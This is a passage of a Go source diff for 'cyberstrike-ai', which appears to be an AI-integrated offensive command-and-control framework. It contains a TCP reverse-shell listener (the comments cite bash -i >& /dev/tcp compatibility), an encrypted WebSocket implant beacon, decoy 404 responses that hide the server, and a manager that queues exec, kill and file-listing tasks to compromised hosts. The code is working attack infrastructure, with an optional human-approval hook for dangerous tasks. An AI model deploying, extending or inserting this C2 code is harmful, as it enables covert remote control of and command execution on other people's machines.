resp, err := client.Do(req)
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusNotFound {
t.Fatalf("status=%d", resp.StatusCode)
}
ct := resp.Header.Get("Content-Type")
if !strings.Contains(ct, "text/html") {
t.Fatalf("content-type=%q body=%q", ct, b)
}
if !strings.Contains(string(b), "404 Not Found") {
t.Fatalf("expected disguised HTML, got: %q", b)
}
})
t.Run("check_in_ok_plaintext_json", func(t *testing.T) {
body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", strings.NewReader(body))
req.Header.Set("X-Implant-Token", token)
req.Header.Set("Content-Type", "application/json")
resp, err := client.Do(req)
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusOK {
t.Fatalf("status=%d body=%s", resp.StatusCode, b)
}
var out ImplantCheckInResponse
if err := json.Unmarshal(b, &out); err != nil {
t.Fatalf("json: %v body=%s", err, b)
}
if out.SessionID == "" || out.NextSleep <= 0 {
t.Fatalf("bad response: %+v", out)
}
})
}
+439
View File
@@ -0,0 +1,439 @@
package c2
import (
"bufio"
"context"
"crypto/sha256"
"encoding/hex"
"fmt"
"io"
"net"
"regexp"
"strings"
"sync"
"sync/atomic"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。
// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容。
// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go)。
// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session
// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
type TCPReverseListener struct {
rec *database.C2Listener
cfg *ListenerConfig
manager *Manager
logger *zap.Logger
mu sync.Mutex
listener net.Listener
stopCh chan struct{}
conns map[string]*tcpReverseConn // session_id → 连接
stopOnce sync.Once
}
// tcpReverseConn 单个反弹会话的运行时状态
type tcpReverseConn struct {
sessionID string
conn net.Conn
reader *bufio.Reader
writeMu sync.Mutex // 序列化 write,避免并发 task 写入
taskMode int32 // 原子标志: 0=空闲(handleConn读), 1=任务中(runTaskOnConn独占读)
}
// NewTCPReverseListener 工厂方法(注册到 ListenerRegistry["tcp_reverse"]
func NewTCPReverseListener(ctx ListenerCreationCtx) (Listener, error) {
return &TCPReverseListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
stopCh: make(chan struct{}),
conns: make(map[string]*tcpReverseConn),
}, nil
}
// Type 返回类型常量
func (l *TCPReverseListener) Type() string { return string(ListenerTypeTCPReverse) }
// Start 启动 TCP 监听,accept 在独立 goroutine 中运行
func (l *TCPReverseListener) Start() error {
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
ln, err := net.Listen("tcp", addr)
if err != nil {
if isAddrInUse(err) {
return ErrPortInUse
}
return err
}
l.mu.Lock()
l.listener = ln
l.mu.Unlock()
go l.acceptLoop()
go l.taskDispatcherLoop()
return nil
}
// Stop 关闭监听 + 所有活动连接
func (l *TCPReverseListener) Stop() error {
l.stopOnce.Do(func() {
close(l.stopCh)
})
l.mu.Lock()
if l.listener != nil {
_ = l.listener.Close()
l.listener = nil
}
for sid, c := range l.conns {
_ = c.conn.Close()
delete(l.conns, sid)
}
l.mu.Unlock()
return nil
}
func (l *TCPReverseListener) acceptLoop() {
for {
l.mu.Lock()
ln := l.listener
l.mu.Unlock()
if ln == nil {
return
}
conn, err := ln.Accept()
if err != nil {
select {
case <-l.stopCh:
return
default:
}
if isClosedConnErr(err) {
return
}
l.logger.Warn("tcp_reverse accept 失败", zap.Error(err))
continue
}
go l.handleConn(conn)
}
}
// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。
func (l *TCPReverseListener) handleConn(conn net.Conn) {
br := bufio.NewReader(conn)
_ = conn.SetReadDeadline(time.Now().Add(20 * time.Second))
prefix, err := br.Peek(4)
if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic {
if _, err := br.Discard(4); err != nil {
_ = conn.Close()
return
}
_ = conn.SetReadDeadline(time.Time{})
l.handleTCPBeaconSession(conn, br)
return
}
_ = conn.SetReadDeadline(time.Time{})
l.handleShellConn(conn, br)
}
// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。
func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) {
remote := conn.RemoteAddr().String()
host, _, _ := net.SplitHostPort(remote)
// 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话
uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host)
hash := sha256.Sum256([]byte(uuidSeed))
implantUUID := hex.EncodeToString(hash[:8])
checkin := ImplantCheckInRequest{
ImplantUUID: implantUUID,
Hostname: "tcp_" + host,
Username: "unknown",
OS: "unknown",
Arch: "unknown",
InternalIP: host,
SleepSeconds: 0, // 交互式不需要 sleep
JitterPercent: 0,
Metadata: map[string]interface{}{
"transport": "tcp_reverse",
"remote": remote,
},
}
session, err := l.manager.IngestCheckIn(l.rec.ID, checkin)
if err != nil {
l.logger.Warn("tcp_reverse 登记会话失败", zap.Error(err))
_ = conn.Close()
return
}
tc := &tcpReverseConn{
sessionID: session.ID,
conn: conn,
reader: br,
}
l.mu.Lock()
if old, exists := l.conns[session.ID]; exists {
_ = old.conn.Close()
}
l.conns[session.ID] = tc
l.mu.Unlock()
defer func() {
l.mu.Lock()
if cur, ok := l.conns[session.ID]; ok && cur == tc {
delete(l.conns, session.ID)
_ = l.manager.MarkSessionDead(session.ID)
}
l.mu.Unlock()
_ = conn.Close()
}()
// 主循环:检测连接存活 + 读取非任务期间的 unsolicited 输出
// 注意:必须统一使用 tc.reader 读取,避免与 runTaskOnConn 的 bufio.Reader 产生数据分裂
buf := make([]byte, 4096)
for {
select {
case <-l.stopCh:
return
default:
}
// 任务执行中,runTaskOnConn 独占读取权,主循环暂停
if atomic.LoadInt32(&tc.taskMode) == 1 {
time.Sleep(100 * time.Millisecond)
continue
}
_ = conn.SetReadDeadline(time.Now().Add(60 * time.Second))
n, err := tc.reader.Read(buf)
if n > 0 {
// 收到数据也刷新心跳
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
if atomic.LoadInt32(&tc.taskMode) == 0 {
l.manager.publishEvent("info", "task", session.ID, "",
"stdout(unsolicited)", map[string]interface{}{
"output": string(buf[:n]),
})
}
}
if err != nil {
if err == io.EOF || isClosedConnErr(err) {
return
}
if ne, ok := err.(net.Error); ok && ne.Timeout() {
// 读超时 = 连接仍存活但无数据,刷新心跳防止看门狗误判
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
continue
}
return
}
}
}
// taskDispatcherLoop 周期扫描所有活动会话的任务队列,下发 exec/shell 类型的同步命令
func (l *TCPReverseListener) taskDispatcherLoop() {
t := time.NewTicker(500 * time.Millisecond)
defer t.Stop()
for {
select {
case <-l.stopCh:
return
case <-t.C:
l.mu.Lock()
snapshot := make([]*tcpReverseConn, 0, len(l.conns))
for _, c := range l.conns {
snapshot = append(snapshot, c)
}
l.mu.Unlock()
for _, c := range snapshot {
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 5)
if err != nil || len(envelopes) == 0 {
continue
}
for _, env := range envelopes {
go l.runTaskOnConn(c, env)
}
}
}
}
}
// runTaskOnConn 把一条 task 转成 raw shell 命令发送,通过结束标记读输出
func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope) {
startedAt := NowUnixMillis()
cmd, ok := buildTCPCommand(TaskType(env.TaskType), env.Payload)
if !ok {
l.reportTaskResult(env.TaskID, startedAt, false, "", "tcp_reverse listener 不支持该任务类型: "+env.TaskType, "", "")
return
}
// 独占读取权:通知 handleConn 主循环暂停
atomic.StoreInt32(&c.taskMode, 1)
defer atomic.StoreInt32(&c.taskMode, 0)
// 等待 handleConn 循环退出读取(给 100ms 让正在进行的 Read 超时/完成)
time.Sleep(150 * time.Millisecond)
// 排空 buffer 中残留的 bash 提示符等数据
drainStaleData(c.reader, c.conn)
endMark := fmt.Sprintf("__C2_DONE_%s__", env.TaskID)
wrapped := fmt.Sprintf("%s\necho %s\n", strings.TrimSpace(cmd), endMark)
c.writeMu.Lock()
_ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second))
if _, err := c.conn.Write([]byte(wrapped)); err != nil {
c.writeMu.Unlock()
l.reportTaskResult(env.TaskID, startedAt, false, "", "写命令失败: "+err.Error(), "", "")
return
}
c.writeMu.Unlock()
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
defer cancel()
output, err := readUntilMarker(ctx, c.reader, endMark)
if err != nil {
l.reportTaskResult(env.TaskID, startedAt, false, output, "读取结果失败: "+err.Error(), "", "")
return
}
cleaned := cleanShellOutput(output, cmd)
l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "")
}
// reportTaskResult 适配 Manager.IngestTaskResult,统一报告路径
func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64, success bool, output, errMsg, blobB64, blobSuffix string) {
_ = l.manager.IngestTaskResult(TaskResultReport{
TaskID: taskID,
Success: success,
Output: output,
Error: errMsg,
BlobBase64: blobB64,
BlobSuffix: blobSuffix,
StartedAt: startedAtMS,
EndedAt: NowUnixMillis(),
})
}
// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。
// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些
// 需要二进制传输的能力建议使用 http_beacon。
func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) {
switch t {
case TaskTypeExec, TaskTypeShell:
cmd, _ := payload["command"].(string)
return cmd, true
case TaskTypePwd:
return "pwd 2>/dev/null || cd", true
case TaskTypeLs:
path, _ := payload["path"].(string)
if strings.TrimSpace(path) == "" {
path = "."
}
return "ls -la " + shellQuote(path), true
case TaskTypePs:
return "ps -ef 2>/dev/null || ps aux", true
case TaskTypeKillProc:
pid, _ := payload["pid"].(float64)
if pid <= 0 {
return "", false
}
return fmt.Sprintf("kill -9 %d", int(pid)), true
case TaskTypeCd:
path, _ := payload["path"].(string)
if strings.TrimSpace(path) == "" {
return "", false
}
return "cd " + shellQuote(path) + " && pwd", true
case TaskTypeExit:
return "exit 0", true
}
return "", false
}
// readUntilMarker 从 reader 持续读,直到匹配 endMarker;返回去掉标记后的输出
func readUntilMarker(ctx context.Context, r *bufio.Reader, marker string) (string, error) {
var sb strings.Builder
buf := make([]byte, 4096)
deadline := time.Now().Add(60 * time.Second)
for {
select {
case <-ctx.Done():
return sb.String(), ctx.Err()
default:
}
if time.Now().After(deadline) {
return sb.String(), fmt.Errorf("timeout")
}
n, err := r.Read(buf)
if n > 0 {
sb.Write(buf[:n])
if idx := strings.Index(sb.String(), marker); idx >= 0 {
return strings.TrimRight(sb.String()[:idx], "\r\n"), nil
}
}
if err != nil {
return sb.String(), err
}
}
}
func shellQuote(s string) string {
return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'"
}
func isAddrInUse(err error) bool {
if err == nil {
return false
}
return strings.Contains(strings.ToLower(err.Error()), "address already in use") ||
strings.Contains(strings.ToLower(err.Error()), "bind: only one usage")
}
func isClosedConnErr(err error) bool {
if err == nil {
return false
}
es := err.Error()
return strings.Contains(es, "use of closed network connection") ||
strings.Contains(es, "connection reset by peer")
}
// drainStaleData 用短超时读取并丢弃 buffer 中残留的 shell 提示符等数据
func drainStaleData(r *bufio.Reader, conn net.Conn) {
buf := make([]byte, 4096)
for {
_ = conn.SetReadDeadline(time.Now().Add(200 * time.Millisecond))
n, err := r.Read(buf)
if n == 0 || err != nil {
break
}
}
// 恢复较长的读超时
_ = conn.SetReadDeadline(time.Time{})
}
var shellPromptRe = regexp.MustCompile(`(?m)^.*?(bash[\-\d.]*\$|[\$#%>]\s*)$`)
// cleanShellOutput 过滤 bash 提示符行和命令回显,返回干净的命令输出
func cleanShellOutput(raw, cmd string) string {
lines := strings.Split(raw, "\n")
var cleaned []string
cmdTrimmed := strings.TrimSpace(cmd)
echoSkipped := false
for _, line := range lines {
trimmed := strings.TrimRight(line, "\r \t")
// 跳过命令回显行(bash 会 echo 回输入的命令)
if !echoSkipped && cmdTrimmed != "" && strings.Contains(trimmed, cmdTrimmed) {
echoSkipped = true
continue
}
// 跳过纯 shell 提示符行
if shellPromptRe.MatchString(trimmed) && len(strings.TrimSpace(shellPromptRe.ReplaceAllString(trimmed, ""))) == 0 {
continue
}
cleaned = append(cleaned, line)
}
result := strings.Join(cleaned, "\n")
return strings.TrimSpace(result)
}
+297
View File
@@ -0,0 +1,297 @@
package c2
import (
"context"
"crypto/subtle"
"encoding/json"
"errors"
"fmt"
"net"
"net/http"
"sync"
"time"
"cyberstrike-ai/internal/database"
"github.com/gorilla/websocket"
"go.uber.org/zap"
)
// WebSocketListener 提供低延迟的双向 WebSocket Beacon。
// 与 HTTP Beacon 相比:
// - beacon 与服务端保持长连接,无需轮询,新任务可"秒到";
// - 适合需要交互式快速响应的场景(如实时键盘 / 流式输出);
// - 协议依然走 AES-256-GCM,握手时校验 X-Implant-Token
// - 一个 listener 仅处理一个 WS 路径(默认 /ws),但可承载多个并发 implant。
//
// 帧协议(皆为加密后 base64 字符串走 TextMessage):
// client → server{"type":"checkin"|"result", "data": <ImplantCheckInRequest|TaskResultReport>}
// server → client{"type":"task", "data": <TaskEnvelope>} 或 {"type":"sleep","data":{"sleep":N,"jitter":J}}
type WebSocketListener struct {
rec *database.C2Listener
cfg *ListenerConfig
manager *Manager
logger *zap.Logger
srv *http.Server
upgrader websocket.Upgrader
mu sync.Mutex
conns map[string]*wsConn // session_id → 连接
stopped bool
stopCh chan struct{}
}
// wsConn 单个 WS implant 的内存状态
type wsConn struct {
sessionID string
ws *websocket.Conn
writeMu sync.Mutex // websocket 同一连接同一时间只能一个 writer
}
// NewWebSocketListener 工厂(注册到 ListenerRegistry["websocket"]
func NewWebSocketListener(ctx ListenerCreationCtx) (Listener, error) {
return &WebSocketListener{
rec: ctx.Listener,
cfg: ctx.Config,
manager: ctx.Manager,
logger: ctx.Logger,
stopCh: make(chan struct{}),
conns: make(map[string]*wsConn),
upgrader: websocket.Upgrader{
ReadBufferSize: 4096,
WriteBufferSize: 4096,
// 允许任意 Originimplant 不带 Origin 或随便填)
CheckOrigin: func(r *http.Request) bool { return true },
},
}, nil
}
// Type 类型
func (l *WebSocketListener) Type() string { return string(ListenerTypeWebSocket) }
// Start 启动 HTTP server 接收 WS 升级
func (l *WebSocketListener) Start() error {
mux := http.NewServeMux()
wsPath := l.cfg.BeaconCheckInPath
if wsPath == "" || wsPath == "/check_in" {
// websocket 默认路径单独定义,避免与 HTTP Beacon 默认路径混淆
wsPath = "/ws"
}
mux.HandleFunc(wsPath, l.handleWS)
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
ln, err := net.Listen("tcp", addr)
if err != nil {
if isAddrInUse(err) {
return ErrPortInUse
}
return err
}
l.srv = &http.Server{
Addr: addr,
Handler: mux,
ReadHeaderTimeout: 15 * time.Second,
}
go func() {
if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) {
l.logger.Warn("websocket Serve exited", zap.Error(err))
}
}()
go l.taskDispatcherLoop()
return nil
}
// Stop 优雅关闭:通知所有 WS 客户端,关闭 server
func (l *WebSocketListener) Stop() error {
l.mu.Lock()
if l.stopped {
l.mu.Unlock()
return nil
}
l.stopped = true
close(l.stopCh)
conns := make([]*wsConn, 0, len(l.conns))
for _, c := range l.conns {
conns = append(conns, c)
}
l.conns = make(map[string]*wsConn)
l.mu.Unlock()
for _, c := range conns {
_ = c.ws.WriteControl(websocket.CloseMessage,
websocket.FormatCloseMessage(websocket.CloseGoingAway, "shutdown"),
time.Now().Add(time.Second))
_ = c.ws.Close()
}
if l.srv != nil {
ctx, cancel := contextWithTimeout(5 * time.Second)
defer cancel()
_ = l.srv.Shutdown(ctx)
}
return nil
}
func (l *WebSocketListener) handleWS(w http.ResponseWriter, r *http.Request) {
got := r.Header.Get("X-Implant-Token")
if got == "" || l.rec.ImplantToken == "" ||
subtle.ConstantTimeCompare([]byte(got), []byte(l.rec.ImplantToken)) != 1 {
http.NotFound(w, r)
return
}
ws, err := l.upgrader.Upgrade(w, r, nil)
if err != nil {
l.logger.Warn("websocket 升级失败", zap.Error(err))
return
}
go l.handleConn(ws)
}
// handleConn 处理一个 WS 连接的完整生命周期:等待 checkin → 登记 session → 读循环
func (l *WebSocketListener) handleConn(ws *websocket.Conn) {
ws.SetReadLimit(64 << 20)
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
ws.SetPongHandler(func(string) error {
ws.SetReadDeadline(time.Now().Add(60 * time.Second))
return nil
})
// 第一帧必须是 checkin
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
if err != nil || frameType != "checkin" {
_ = ws.Close()
return
}
var req ImplantCheckInRequest
if err := json.Unmarshal(body, &req); err != nil {
_ = ws.Close()
return
}
if req.SleepSeconds <= 0 {
req.SleepSeconds = l.cfg.DefaultSleep
}
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
if err != nil {
_ = ws.Close()
return
}
conn := &wsConn{sessionID: session.ID, ws: ws}
l.mu.Lock()
l.conns[session.ID] = conn
l.mu.Unlock()
defer func() {
l.mu.Lock()
delete(l.conns, session.ID)
l.mu.Unlock()
_ = ws.Close()
_ = l.manager.MarkSessionDead(session.ID)
}()
// 心跳 goroutine
pingTicker := time.NewTicker(20 * time.Second)
defer pingTicker.Stop()
go func() {
for {
select {
case <-l.stopCh:
return
case <-pingTicker.C:
conn.writeMu.Lock()
_ = ws.WriteControl(websocket.PingMessage, nil, time.Now().Add(5*time.Second))
conn.writeMu.Unlock()
}
}
}()
// 主读循环:处理 result 等帧
for {
frameType, body, err := readEncryptedFrame(ws, l.rec.EncryptionKey)
if err != nil {
return
}
switch frameType {
case "result":
var report TaskResultReport
if err := json.Unmarshal(body, &report); err == nil {
_ = l.manager.IngestTaskResult(report)
}
case "checkin":
// 心跳更新:beacon 周期性送上心跳
var hb ImplantCheckInRequest
if err := json.Unmarshal(body, &hb); err == nil {
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
}
}
}
}
// taskDispatcherLoop 周期扫描所有活动 WS 会话,下发任务
func (l *WebSocketListener) taskDispatcherLoop() {
t := time.NewTicker(500 * time.Millisecond)
defer t.Stop()
for {
select {
case <-l.stopCh:
return
case <-t.C:
l.mu.Lock()
snapshot := make([]*wsConn, 0, len(l.conns))
for _, c := range l.conns {
snapshot = append(snapshot, c)
}
l.mu.Unlock()
for _, c := range snapshot {
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 20)
if err != nil || len(envelopes) == 0 {
continue
}
for _, env := range envelopes {
l.sendTaskFrame(c, env)
}
}
}
}
}
func (l *WebSocketListener) sendTaskFrame(c *wsConn, env TaskEnvelope) {
frame := map[string]interface{}{"type": "task", "data": env}
body, err := json.Marshal(frame)
if err != nil {
return
}
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
if err != nil {
return
}
c.writeMu.Lock()
defer c.writeMu.Unlock()
_ = c.ws.SetWriteDeadline(time.Now().Add(10 * time.Second))
_ = c.ws.WriteMessage(websocket.TextMessage, []byte(enc))
}
// readEncryptedFrame 读一帧加密 WS 文本,返回类型和明文 data
func readEncryptedFrame(ws *websocket.Conn, key string) (string, []byte, error) {
mt, raw, err := ws.ReadMessage()
if err != nil {
return "", nil, err
}
if mt != websocket.TextMessage && mt != websocket.BinaryMessage {
return "", nil, errors.New("unexpected ws frame type")
}
plain, err := DecryptAESGCM(key, string(raw))
if err != nil {
return "", nil, err
}
var env struct {
Type string `json:"type"`
Data json.RawMessage `json:"data"`
}
if err := json.Unmarshal(plain, &env); err != nil {
return "", nil, err
}
return env.Type, env.Data, nil
}
// contextWithTimeout 简单封装,避免 listener 文件之间反复 import context
func contextWithTimeout(d time.Duration) (context.Context, context.CancelFunc) {
return context.WithTimeout(context.Background(), d)
}
+779
View File
@@ -0,0 +1,779 @@
package c2
import (
"context"
"encoding/json"
"errors"
"fmt"
"path/filepath"
"regexp"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/database"
"github.com/google/uuid"
"go.uber.org/zap"
)
// Manager 是 C2 模块对外的统一门面:
// - HTTP handler / MCP 工具 / 多代理 / 攻击链记录器 全部通过 Manager 操作 C2
// 不直接接触 listener 实现细节,避免循环依赖;
// - 持有数据库句柄 + 事件总线 + 内存中的 listener 实例 map
// - 启动期可调用 RestoreRunningListeners() 把 status=running 的 listener 重新拉起。
//
// 实例化由 internal/app 负责,注入到全局 App 之后再分别交给 handler / mcp.
type Manager struct {
db *database.DB
logger *zap.Logger
bus *EventBus
registry *ListenerRegistry
mu sync.RWMutex
runningListeners map[string]Listener // listener_id → 已 Start 的 listener 实例
storageDir string // 大结果(截图/下载)落盘根目录
hitlBridge HITLBridge // 危险任务在 EnqueueTask 时调它发起审批(nil 表示不接 HITL)
hitlDangerousGate func(conversationID, mcpToolName string) bool // 与人机协同一致:为 nil 或返回 false 时不走桥
hooks Hooks // 扩展挂钩:会话上线 / 任务完成 时通知漏洞库与攻击链
}
// MCPToolC2Task 与 MCP builtin、c2_task 工具名一致,供 HITL 白名单与 Agent 侧对齐。
const MCPToolC2Task = "c2_task"
// HITLBridge 把"危险任务"桥到现有 internal/handler/hitl 审批流的接口。
// internal/app 实例化时传入;空实现表示禁用 HITL 拦截(开发期方便)。
type HITLBridge interface {
// RequestApproval 阻塞等待人工审批;返回 nil 表示批准,error 表示拒绝/超时。
// ctx 携带用户/会话信息;危险任务调用时会创建超时 ctx 避免无限挂起。
RequestApproval(ctx context.Context, req HITLApprovalRequest) error
}
// HITLApprovalRequest 待审批的 C2 操作描述
type HITLApprovalRequest struct {
TaskID string
SessionID string
TaskType string
PayloadJSON string
ConversationID string
Source string
Reason string
}
// Hooks 给上层(漏洞管理 / 攻击链)注入回调
type Hooks struct {
OnSessionFirstSeen func(session *database.C2Session) // 新会话首次上线
OnTaskCompleted func(task *database.C2Task, sessionID string) // 任务完成(success/failed
}
// NewManager 创建 Manager;不会启动任何 listener,请显式调 RestoreRunningListeners
func NewManager(db *database.DB, logger *zap.Logger, storageDir string) *Manager {
if logger == nil {
logger = zap.NewNop()
}
if storageDir == "" {
storageDir = "tmp/c2"
}
return &Manager{
db: db,
logger: logger,
bus: NewEventBus(),
registry: NewListenerRegistry(),
runningListeners: make(map[string]Listener),
storageDir: storageDir,
}
}
// SetHITLBridge 设置危险任务审批桥;nil 表示禁用
func (m *Manager) SetHITLBridge(b HITLBridge) {
m.mu.Lock()
m.hitlBridge = b
m.mu.Unlock()
}
// SetHITLDangerousGate 设置 C2 危险任务是否应走 HITL 桥;须与 Agent 人机协同判定一致(例如 handler.HITLManager.NeedsToolApproval)。
// gate 为 nil 时,即使已设置桥也不会对危险任务发起审批(与未开启人机协同时其他工具行为一致)。
func (m *Manager) SetHITLDangerousGate(gate func(conversationID, mcpToolName string) bool) {
m.mu.Lock()
m.hitlDangerousGate = gate
m.mu.Unlock()
}
// SetHooks 注入业务钩子
func (m *Manager) SetHooks(h Hooks) {
m.mu.Lock()
m.hooks = h
m.mu.Unlock()
}
// EventBus 暴露事件总线给 SSE handler
func (m *Manager) EventBus() *EventBus { return m.bus }
// DB 暴露 DB 句柄给 handler/mcptools 直接读写(避免到处包装)
func (m *Manager) DB() *database.DB { return m.db }
// Logger 暴露日志句柄
func (m *Manager) Logger() *zap.Logger { return m.logger }
// StorageDir 大结果落盘根目录
func (m *Manager) StorageDir() string { return m.storageDir }
// Registry 暴露 listener 注册表,便于在 internal/app 启动时按 type 注册具体实现
func (m *Manager) Registry() *ListenerRegistry { return m.registry }
// Close 优雅关闭:停掉所有运行中的 listener,关闭事件总线
func (m *Manager) Close() {
m.mu.Lock()
listeners := make([]Listener, 0, len(m.runningListeners))
for _, l := range m.runningListeners {
listeners = append(listeners, l)
}
m.runningListeners = make(map[string]Listener)
m.mu.Unlock()
for _, l := range listeners {
_ = l.Stop()
}
m.bus.Close()
}
// ----------------------------------------------------------------------------
// Listener 生命周期
// ----------------------------------------------------------------------------
// CreateListenerInput Web/MCP 创建监听器的入参(已校验 + 已 trim)
type CreateListenerInput struct {
Name string
Type string
BindHost string
BindPort int
ProfileID string
Remark string
Config *ListenerConfig
// CallbackHost 非空时写入 config_json.callback_host,供 Payload 默认回连(不修改 bind
CallbackHost string
}
// CreateListener 校验并落库;不自动启动(与 systemd unit 一致:先创建后启动)
func (m *Manager) CreateListener(in CreateListenerInput) (*database.C2Listener, error) {
if strings.TrimSpace(in.Name) == "" {
return nil, ErrInvalidInput
}
if !IsValidListenerType(in.Type) {
return nil, ErrUnsupportedType
}
if err := SafeBindPort(in.BindPort); err != nil {
return nil, &CommonError{Code: "invalid_port", Message: err.Error(), HTTP: 400}
}
bindHost := strings.TrimSpace(in.BindHost)
if bindHost == "" {
bindHost = "127.0.0.1" // 默认绑定环回,需要外网时操作员显式改
}
cfg := in.Config
if cfg == nil {
cfg = &ListenerConfig{}
} else {
cp := *cfg
cfg = &cp
}
if ch := strings.TrimSpace(in.CallbackHost); ch != "" {
cfg.CallbackHost = ch
}
cfg.ApplyDefaults()
cfgJSON, err := json.Marshal(cfg)
if err != nil {
return nil, fmt.Errorf("marshal listener config: %w", err)
}
keyB64, err := GenerateAESKey()
if err != nil {
return nil, fmt.Errorf("generate key: %w", err)
}
tokenB64, err := GenerateImplantToken()
if err != nil {
return nil, fmt.Errorf("generate token: %w", err)
}
listener := &database.C2Listener{
ID: "l_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14],
Name: strings.TrimSpace(in.Name),
Type: strings.ToLower(strings.TrimSpace(in.Type)),
BindHost: bindHost,
BindPort: in.BindPort,
ProfileID: strings.TrimSpace(in.ProfileID),
EncryptionKey: keyB64,
ImplantToken: tokenB64,
Status: "stopped",
ConfigJSON: string(cfgJSON),
Remark: strings.TrimSpace(in.Remark),
CreatedAt: time.Now(),
}
if err := m.db.CreateC2Listener(listener); err != nil {
return nil, err
}
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已创建", listener.Name), map[string]interface{}{
"listener_id": listener.ID,
"type": listener.Type,
})
return listener, nil
}
// StartListener 启动指定 listener;幂等(已运行时返回 ErrListenerRunning
func (m *Manager) StartListener(id string) (*database.C2Listener, error) {
rec, err := m.db.GetC2Listener(id)
if err != nil {
return nil, err
}
if rec == nil {
return nil, ErrListenerNotFound
}
m.mu.Lock()
if _, ok := m.runningListeners[id]; ok {
m.mu.Unlock()
return rec, ErrListenerRunning
}
m.mu.Unlock()
cfg := &ListenerConfig{}
if rec.ConfigJSON != "" {
_ = json.Unmarshal([]byte(rec.ConfigJSON), cfg)
}
cfg.ApplyDefaults()
// 通过工厂创建具体实现。必须使用 rec 的副本:HTTP handler 在返回 JSON 前会清空
// rec.ImplantToken / EncryptionKey 做脱敏,若 listener 实现持有同一指针会导致 beacon 鉴权永久失败。
listenerRec := *rec
factory := m.registry.Get(rec.Type)
if factory == nil {
return nil, ErrUnsupportedType
}
inst, err := factory(ListenerCreationCtx{
Listener: &listenerRec,
Config: cfg,
Manager: m,
Logger: m.logger.With(zap.String("listener_id", rec.ID), zap.String("type", rec.Type)),
})
if err != nil {
return nil, err
}
if err := inst.Start(); err != nil {
now := time.Now()
_ = m.db.SetC2ListenerStatus(rec.ID, "error", err.Error(), &now)
m.publishEvent("warn", "listener", "", "", fmt.Sprintf("监听器 %s 启动失败: %v", rec.Name, err), map[string]interface{}{
"listener_id": rec.ID,
})
return nil, err
}
m.mu.Lock()
m.runningListeners[rec.ID] = inst
m.mu.Unlock()
now := time.Now()
_ = m.db.SetC2ListenerStatus(rec.ID, "running", "", &now)
rec.Status = "running"
rec.StartedAt = &now
rec.LastError = ""
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已启动", rec.Name), map[string]interface{}{
"listener_id": rec.ID,
"bind": fmt.Sprintf("%s:%d", rec.BindHost, rec.BindPort),
})
return rec, nil
}
// StopListener 停止;幂等(未运行时返回 ErrListenerStopped
func (m *Manager) StopListener(id string) error {
m.mu.Lock()
inst, ok := m.runningListeners[id]
if ok {
delete(m.runningListeners, id)
}
m.mu.Unlock()
if !ok {
return ErrListenerStopped
}
if err := inst.Stop(); err != nil {
return err
}
_ = m.db.SetC2ListenerStatus(id, "stopped", "", nil)
rec, _ := m.db.GetC2Listener(id)
name := id
if rec != nil {
name = rec.Name
}
m.publishEvent("info", "listener", "", "", fmt.Sprintf("监听器 %s 已停止", name), map[string]interface{}{
"listener_id": id,
})
return nil
}
// DeleteListener 停止并删除(级联 sessions/tasks/files
func (m *Manager) DeleteListener(id string) error {
_ = m.StopListener(id)
return m.db.DeleteC2Listener(id)
}
// IsListenerRunning 内存中的运行状态(DB 中的 status 可能因崩溃而过时)
func (m *Manager) IsListenerRunning(id string) bool {
m.mu.RLock()
defer m.mu.RUnlock()
_, ok := m.runningListeners[id]
return ok
}
// RestoreRunningListeners 启动期把 DB 中 status=running 的 listener 重新拉起;
// 失败的会被改为 status=error,不会阻塞整个 App 启动。
func (m *Manager) RestoreRunningListeners() {
listeners, err := m.db.ListC2Listeners()
if err != nil {
